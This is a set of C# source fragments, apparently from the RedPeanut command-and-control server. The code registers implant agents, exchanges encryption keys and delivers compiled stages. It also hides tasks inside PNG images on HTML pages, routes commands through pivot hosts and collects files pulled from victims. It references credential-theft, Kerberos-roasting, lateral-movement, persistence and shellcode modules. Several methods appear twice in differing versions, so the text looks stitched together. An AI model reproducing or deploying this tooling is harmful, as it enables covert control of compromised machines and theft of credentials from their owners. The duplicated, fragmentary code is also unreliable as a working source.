//Send agentid
//RC4 with serverkey
private string CreateMsgAgentId(IAgentInstance agent, string serverkey, int profileid, int targetframework)
{
string mesg = "";
string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profileid))
{
AesManaged aes = agent.AesManager;
AgentIdMsg msg = new AgentIdMsg
{
agentid = agent.AgentId,
sessionkey = aes.Key,
sessioniv = aes.IV
};
HttpProfile profile = Program.GetC2Manager().GetC2Server().GetProfile(profileid);
ListenerConfig conf = new ListenerConfig("", ((AgentInstanceHttp)agent).GetAddress(), ((AgentInstanceHttp)agent).GetPort(), profile, profileid);
string source = System.IO.File.ReadAllText(Path.Combine(folderrpath, AGENT_TEMPLATE));
source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), targetframework, conf);
msg.stage = Convert.ToBase64String(CompressGZipAssembly(Builder.BuidStreamAssembly(source, agent.AgentId + ".dll", targetframework, compprofile: CompilationProfile.Agent)));
string agentidnmsg = JsonConvert.SerializeObject(msg, Formatting.Indented);
mesg = EncryptMessage(serverkey, agentidnmsg);
}
return(mesg);
}
public ActionResult <string> Post()
{
//Console.WriteLine("[*] Post request");
//Step 1 agent
if (string.IsNullOrEmpty(GetCookieValue("sessionid")))
{
StreamReader reader = new StreamReader(Request.Body, System.Text.Encoding.UTF8);
return(StepOne(reader));
}
else
{
// Request has a cookie
// Must be RC4 encrypted with serverkey
// No other sec check over the cookie
// Body must be entrcypted with session shared key iv pair
try
{
string decriptedAgentid = DecryptMessage(RedPeanutC2.server.GetServerKey(), GetCookieValue("sessionid"));
//Check if agentid exists in any state
IAgentInstance agent = null;
if (RedPeanutC2.server.GetAgents().ContainsKey(decriptedAgentid))
{
// Agent registered as active check message type Response, AgentIdReqMsg,
StreamReader reader = new StreamReader(Request.Body, System.Text.Encoding.UTF8);
agent = RedPeanutC2.server.GetAgents().GetValueOrDefault(decriptedAgentid);
return(PostResponse(reader, agent));
}
else
{
if (RedPeanutC2.server.GetInboundAgents().ContainsKey(decriptedAgentid))
{
// Cookie present and agent is in inboud queue post need to be Aes ChekIn
StreamReader reader = new StreamReader(Request.Body, System.Text.Encoding.UTF8);
agent = RedPeanutC2.server.GetInboundAgents().GetValueOrDefault(decriptedAgentid);
return(CheckIn(reader, agent));
}
else
{
// Agent does not exeists corrupted session or request not legitimate
Console.WriteLine("[x] Agent does not exeists corrupted session or request not legitimate");
Program.GetMenuStack().Peek().RePrintCLI();
httpContextAccessor.HttpContext.Response.Headers.Add("Connection", "Close");
return(NotFound());
}
}
}
catch (Exception e)
{
// Operation error
Console.WriteLine("[x] Operation error {0}", e.Message);
Program.GetMenuStack().Peek().RePrintCLI();
httpContextAccessor.HttpContext.Response.Headers.Add("Connection", "Close");
return(NotFound());
}
}
}
private string CreateOkMgs(IAgentInstance agent)
{
AesManaged aes = agent.AesManager;
string mesg = Convert.ToBase64String(EncryptAesMessage("Ok", aes));
return(mesg);
}
public AgentInstanceHttp(C2Server server, string agentid, string serverkey, int targetframework, IAgentInstance agent, int profileid)
{
this.agentid = agentid;
this.serverkey = serverkey;
this.server = server;
this.targetframwork = targetframework;
aes = new AesManaged();
pivoter = agent;
this.profileid = profileid;
}
private IAgentInstance CreateAgentInstance(C2Server server, string agentid, string agentPivotid, string serverkey,
string address, int port, int framework, int profileid, byte[] sessionkey = null, byte[] sessioniv = null)
{
IAgentInstance agent = new AgentInstanceHttp(server, agentid, serverkey, address, port, framework, profileid, sessionkey, sessioniv);
//If agentidreq come from a pivoter set the prop
if (!string.IsNullOrEmpty(agentPivotid))
{
IAgentInstance agentInstance = RedPeanutC2.server.GetAgent(agentPivotid);
agent.Pivoter = agentInstance;
}
return(agent);
}
public void PrintAgentCheckedIn(IAgentInstance agent)
{
lock (_printlocker)
{
Console.WriteLine("\n[*] Agent " + agent.AgentId + " checkedin");
Console.WriteLine("[*] {0}", new string('-', 144));
Console.WriteLine("[*] | {0,-10} | {1,-15} | {2,-10} | {3,-32} | {4,-20} | {5,-40} |", "Agent", "IP", "Integrity", "User", "Process", "System");
Console.WriteLine("[*] {0}", new string('-', 144));
Console.WriteLine("[*] | {0,-10} | {1,-15} | {2,-10} | {3,-32} | {4,-20} | {5,-40} |", agent.AgentId, agent.SysInfo.Ip, agent.SysInfo.Integrity, agent.SysInfo.User, agent.SysInfo.ProcessName, agent.SysInfo.Os);
Console.WriteLine("[*] {0}", new string('-', 144));
Program.GetMenuStack().Peek().RePrintCLI();
}
}
public AgentInstanceHttp(C2Server server, string agentid, string serverkey, int targetframework, IAgentInstance agent, int profileid)
{
this.agentid = agentid;
this.serverkey = serverkey;
this.server = server;
this.targetframwork = targetframework;
aes = new AesManaged();
pivoter = agent;
this.profileid = profileid;
HttpProfile profile = Program.GetC2Manager().GetC2Server().GetProfile(profileid);
Managed = profile.InjectionManaged;
lastseen = DateTime.Now;
}
public static void PrintCLI(IAgentInstance agent)
{
Console.ForegroundColor = ConsoleColor.White;
Console.Write("[");
Console.ForegroundColor = ConsoleColor.Red;
Console.Write("RP");
Console.ForegroundColor = ConsoleColor.White;
Console.Write("]");
Console.ForegroundColor = ConsoleColor.Gray;
Console.Write(" {0} ", agent.AgentId);
Console.ForegroundColor = ConsoleColor.White;
Console.Write("> ");
Console.ForegroundColor = ConsoleColor.Gray;
}
private string CreateTaskMgs(IAgentInstance agent, TaskMsg task)
{
AesManaged aes = agent.AesManager;
HttpProfile profile = Program.GetC2Manager().GetC2Server().GetProfile(Profileid);
string mesg;
if (profile.HtmlCovered)
{
string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER);
string outputfolderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, ASSEMBLY_OIUTPUT_FOLDER);
string htmlsource = System.IO.File.ReadAllText(Path.Combine(folderrpath, HTML_TEMPLATE));
int elements = htmlsource.Split("targetclass").Length - 1;
if (elements <= 0)
{
return("");
}
string[] images = ListImages();
Random random = new Random();
int payloadindex = random.Next(1, elements);
//Create Image with task embedded
string taskmsg = JsonConvert.SerializeObject(task, Formatting.Indented);
taskmsg = Convert.ToBase64String(EncryptAesMessage(taskmsg, aes));
string outputfilename = RandomAString(10, random) + ".png";
string outfullpath = Path.Combine(outputfolderrpath, outputfilename);
string imagepath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, IMAGELOAD_FOLDER, "images", images[payloadindex - 1]);
ImageGenerator.Create(Encoding.Default.GetBytes(taskmsg), imagepath, outfullpath);
//Add Image to resources
C2Manager c2manager = Program.GetC2Manager();
c2manager.GetC2Server().RegisterWebResource(outputfilename, new WebResourceInstance(null, outputfilename));
//Create html page
htmlsource = Replacer.ReplaceHtmlProfile(htmlsource, profile.TargetClass, Encoding.Default.GetBytes(taskmsg).Length, outputfilename, elements, payloadindex, images);
return(htmlsource);
}
else
{
string tasknmsg = JsonConvert.SerializeObject(task, Formatting.Indented);
mesg = Convert.ToBase64String(EncryptAesMessage(tasknmsg, aes));
return(mesg);
}
}
private ActionResult CheckIn(StreamReader reader, IAgentInstance agent)
{
CheckInMsg checkinmsg = null;
try
{
Dictionary <string, string> args = GetParsedArgs(reader.ReadToEnd());
checkinmsg = GetCheckInMsg(args.GetValueOrDefault(Paramname), agent);
try
{
agent.SysInfo = checkinmsg.systeminfo;
Console.WriteLine("\n[*] Agent " + agent.AgentId + " checkedin");
Console.WriteLine("[*] {0}", new string('-', 144));
Console.WriteLine("[*] | {0,-10} | {1,-15} | {2,-10} | {3,-32} | {4,-20} | {5,-40} |", "Agent", "IP", "Integrity", "User", "Process", "System");
Console.WriteLine("[*] {0}", new string('-', 144));
Console.WriteLine("[*] | {0,-10} | {1,-15} | {2,-10} | {3,-32} | {4,-20} | {5,-40} |", agent.AgentId, agent.SysInfo.Ip, agent.SysInfo.Integrity, agent.SysInfo.User, agent.SysInfo.ProcessName, agent.SysInfo.Os);
Console.WriteLine("[*] {0}", new string('-', 144));
Program.GetMenuStack().Peek().RePrintCLI();
try
{
RedPeanutC2.server.RemoveAgentInbound(agent.AgentId);
}
catch (Exception)
{
}
RedPeanutC2.server.RegisterAgent(agent.AgentId, agent);
return(Ok(CreateOkMgs(agent)));
}
catch (Exception e)
{
Console.WriteLine("[x] Error during checkin agentid {0}", agent.AgentId);
Console.WriteLine("[x] {0}", e.Message);
Program.GetMenuStack().Peek().RePrintCLI();
httpContextAccessor.HttpContext.Response.Headers.Add("Connection", "Close");
return(NotFound());
}
}
catch (Exception e)
{
// Something goes wrong decripting or deserializing message return not found
Console.WriteLine("[x] Something goes wrong decripting or deserializing message return not found 2");
Console.WriteLine("[x] {0}", e.StackTrace);
httpContextAccessor.HttpContext.Response.Headers.Add("Connection", "Close");
return(NotFound());
}
}
private ActionResult StepOne(StreamReader reader)
{
AgentIdReqMsg agentidrequest = null;
try
{
string line_t = reader.ReadToEnd();
Dictionary <string, string> args = GetParsedArgs(line_t);
var line = DecryptMessage(RedPeanutC2.server.GetServerKey(), args.GetValueOrDefault(Paramname));
agentidrequest = JsonConvert.DeserializeObject <AgentIdReqMsg>(line);
}
catch (Exception)
{
// Someting goes wrong decrypting or deserializing message return not found
Console.WriteLine("[x] Something goes wrong decrypting or deserializing message return not found");
Program.GetMenuStack().Peek().RePrintCLI();
httpContextAccessor.HttpContext.Response.Headers.Add("Connection", "Close");
return(NotFound());
}
try
{
IAgentInstance agent = new AgentInstanceHttp(RedPeanutC2.server, RandomString(10, RedPeanutC2.server.GetRandomObject()), RedPeanutC2.server.GetServerKey(), agentidrequest.address, agentidrequest.port, agentidrequest.framework, Profileid);
//If agentidreq come from a pivoter set the prop
if (!string.IsNullOrEmpty(agentidrequest.AgentPivot))
{
IAgentInstance agentInstance = RedPeanutC2.server.GetAgent(agentidrequest.AgentPivot);
agent.Pivoter = agentInstance;
}
RedPeanutC2.server.RegisterAgentInbound(agent.AgentId, agent);
string response = CreateMsgAgentId(agent, RedPeanutC2.server.GetServerKey(), Profileid, agentidrequest.framework);
//Set cookie
SetCookieValue("sessionid", EncryptMessage(RedPeanutC2.server.GetServerKey(), agent.AgentId), 0);
Console.WriteLine("\n[*] Agent {0} connected", agent.AgentId);
Program.GetMenuStack().Peek().RePrintCLI();
return(Ok(response));
}
catch (Exception e)
{
// Operation error
Console.WriteLine("[x] Operation error {0}", e.Message);
Program.GetMenuStack().Peek().RePrintCLI();
httpContextAccessor.HttpContext.Response.Headers.Add("Connection", "Close");
return(NotFound());
}
}
public static string RedPeanutCLI(IAgentInstance agent)
{
PrintCLI(agent);
string input = ReadLine.Read();
StandardCommand cmd = new StandardCommand(agent);
if (cmd.Execute(input))
{
input = "";
}
if (input.Trim().Length > 0)
{
ReadLine.AddHistory(input);
}
return(input);
}
private Models.CheckInMsg GetCheckInMsg(string input, IAgentInstance agent)
{
var result = Convert.FromBase64String(input);
//Espect cehckin message
string line = DecryptAesMessage(result, agent.AesManager);
CheckInMsg msg = new CheckInMsg();
try
{
msg = JsonConvert.DeserializeObject <CheckInMsg>(line);
}
catch (Exception e)
{
Console.WriteLine("Error: " + e.Message);
}
return(msg);
}
private ActionResult CheckIn(StreamReader reader, IAgentInstance agent)
{
CheckInMsg checkinmsg = null;
try
{
Dictionary <string, string> args = GetParsedArgs(reader.ReadToEnd());
checkinmsg = GetCheckInMsg(args.GetValueOrDefault(Paramname), agent);
try
{
agent.SysInfo = checkinmsg.systeminfo;
try
{
RedPeanutC2.server.RemoveAgentInbound(agent.AgentId);
}
catch (Exception)
{
}
RedPeanutC2.server.RegisterAgent(agent.AgentId, agent);
RedPeanutC2.server.PrintAgentCheckedIn(agent);
return(Ok(CreateOkMgs(agent)));
}
catch (Exception e)
{
Console.WriteLine("[x] Error during checkin agentid {0}", agent.AgentId);
Console.WriteLine("[x] {0}", e.Message);
Program.GetMenuStack().Peek().RePrintCLI();
httpContextAccessor.HttpContext.Response.Headers.Add("Connection", "Close");
return(NotFound());
}
}
catch (Exception e)
{
// Something goes wrong decripting or deserializing message return not found
Console.WriteLine("[x] Something goes wrong decripting or deserializing message return not found 2");
Console.WriteLine("[x] {0}", e.StackTrace);
httpContextAccessor.HttpContext.Response.Headers.Add("Connection", "Close");
return(NotFound());
}
}
public void AddCommand(IAgentInstance agent, TaskMsg task)
{
if (agent.Pivoter != null)
{
//Agent pivoted so command will be routed via pivoter
if (!commandqueue.ContainsKey(agent.Pivoter.AgentId))
{
commandqueue.Add(agent.Pivoter.AgentId, new List <TaskMsg>());
}
commandqueue.GetValueOrDefault(agent.Pivoter.AgentId).Add(task);
}
else
{
if (!commandqueue.ContainsKey(agent.AgentId))
{
commandqueue.Add(agent.AgentId, new List <TaskMsg>());
}
commandqueue.GetValueOrDefault(agent.AgentId).Add(task);
}
}
private Models.ResponseMsg GetResponseMsg(string input, IAgentInstance agent)
{
var result = Convert.FromBase64String(input);
//Espect cehckin message
string line = DecryptAesMessage(result, agent.AesManager);
ResponseMsg msg = new Models.ResponseMsg();
try
{
msg = JsonConvert.DeserializeObject <ResponseMsg>(line);
((AgentInstanceHttp)agent).SysInfo = msg.SystemInfo;
}
catch (Exception e)
{
Console.WriteLine("Error: " + e.Message);
}
return(msg);
}
public ActionResult <string> Get()
{
//Call by agent to check if there is a task to execute
//need to check auth
try
{
string decriptedAgentid = DecryptMessage(RedPeanutC2.server.GetServerKey(), GetCookieValue("sessionid"));
// Try to find Agent
IAgentInstance agent = RedPeanutC2.server.GetAgent(decriptedAgentid);
if (agent != null)
{
agent.lastseen = DateTime.Now;
TaskMsg msg = RedPeanutC2.server.GetCommand(agent);
if (msg != null)
{
string response = CreateTaskMgs(agent, msg);
RedPeanutC2.server.RemoveCommand(agent, msg);
Console.WriteLine("\n[*] Agent {0} tasked to run command...", agent.AgentId);
Program.GetMenuStack().Peek().RePrintCLI();
return(Ok(response));
}
else
{
return(Ok());
}
}
else
{
return(NotFound());
}
}
catch (HttpOperationException)
{
return(NotFound());
}
catch (Exception)
{
return(NotFound());
}
}
private ActionResult PostResponse(StreamReader reader, IAgentInstance agent)
{
ResponseMsg responsemsg = null;
try
{
Dictionary <string, string> args = GetParsedArgs(reader.ReadToEnd());
responsemsg = GetResponseMsg(args.GetValueOrDefault(Paramname), agent);
TaskMsg msg = RedPeanutC2.server.GetTaskResponse(responsemsg.TaskInstanceid);
Console.WriteLine("\n[*] Received response from agent {0}....", agent.AgentId);
if (msg.TaskType.Equals("download"))
{
byte[] bytefile = Utility.DecompressDLL(Convert.FromBase64String(responsemsg.Data));
string destfolder = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, DOWNLOADS_FOLDER, "downloaded_item_" + msg.DownloadTask.FileNameDest);
System.IO.File.WriteAllBytes(destfolder, bytefile);
Console.WriteLine("[*] File {0} downloaded", destfolder);
Program.GetMenuStack().Peek().RePrintCLI();
return(Ok(CreateOkMgs(agent)));
}
else
{
Console.WriteLine(responsemsg.Data);
Program.GetMenuStack().Peek().RePrintCLI();
return(Ok(CreateOkMgs(agent)));
}
}
catch (Exception e)
{
// Something goes wrong decrypting or deserializing message return not found
Console.WriteLine("[x] Something goes wrong decrypting or deserializing message return {0}", e.Message);
Console.WriteLine("[x] {0}", e.StackTrace);
Program.GetMenuStack().Peek().RePrintCLI();
httpContextAccessor.HttpContext.Response.Headers.Add("Connection", "Close");
return(NotFound());
}
}
public ActionResult <string> Get()
{
//Call by agent to check if there is a task to execute
//need to check auth
try
{
string decriptedAgentid = DecryptMessage(RedPeanutC2.server.GetServerKey(), GetCookieValue("sessionid"));
// Try to find Agent
IAgentInstance agent = RedPeanutC2.server.GetAgent(decriptedAgentid);
if (agent != null)
{
TaskMsg msg = RedPeanutC2.server.GetCommand(agent);
if (msg != null)
{
string response = CreateTaskMgs(agent, msg);
RedPeanutC2.server.RemoveCommand(agent, msg);
return(Ok(response));
}
else
{
Console.WriteLine("No command");
return(Ok());
}
}
else
{
return(NotFound());
}
}
catch (HttpOperationException)
{
return(NotFound());
}
catch (Exception)
{
return(NotFound());
}
}
public static void RunAssembly(string resname, string type, string[] args, IAgentInstance agent)
{
if (agent != null)
{
ModuleConfig modconfig = new ModuleConfig
{
Assembly = ReadResourceFile(resname),
Method = "Execute",
Moduleclass = type,
Parameters = args
};
if (agent.Managed)
{
modconfig.Assembly = ReadResourceFile(resname);
}
else
{
modconfig.Assembly = Convert.ToBase64String(CompressGZipAssembly(Builder.GenerateShellcode(
ReadResourceFile(resname), RandomAString(10, new Random()) + ".exe", type, "Execute", args)));
}
TaskMsg task = new TaskMsg
{
TaskType = "module",
Instanceid = RandomAString(10, new Random()),
ModuleTask = modconfig,
Agentid = agent.AgentId
};
if (agent.Pivoter != null)
{
task.AgentPivot = agent.Pivoter.AgentId;
}
agent.SendCommand(task);
}
}
public SharpDPAPICredentialsManager(IAgentInstance agent)
{
this.agent = agent;
}
public SharpPsExecManager(IAgentInstance agent)
{
this.agent = agent;
}
public SpawnAsAgentManager(IAgentInstance agent)
{
this.agent = agent;
}
public RubeusASREPRoastManager(IAgentInstance agent)
{
this.agent = agent;
}
public PersCLRManager(IAgentInstance agent)
{
this.agent = agent;
}
public SharpDPAPIMasterKeysManager(IAgentInstance agent)
{
this.agent = agent;
}
public RubeusDumpManager(IAgentInstance agent)
{
this.agent = agent;
}
public LateralMSBuildManager(IAgentInstance agent)
{
this.agent = agent;
}
public PowerShellExecuterManager(IAgentInstance agent)
{
this.agent = agent;
}
public DownLoadManager(IAgentInstance agent)
{
this.agent = agent;
}
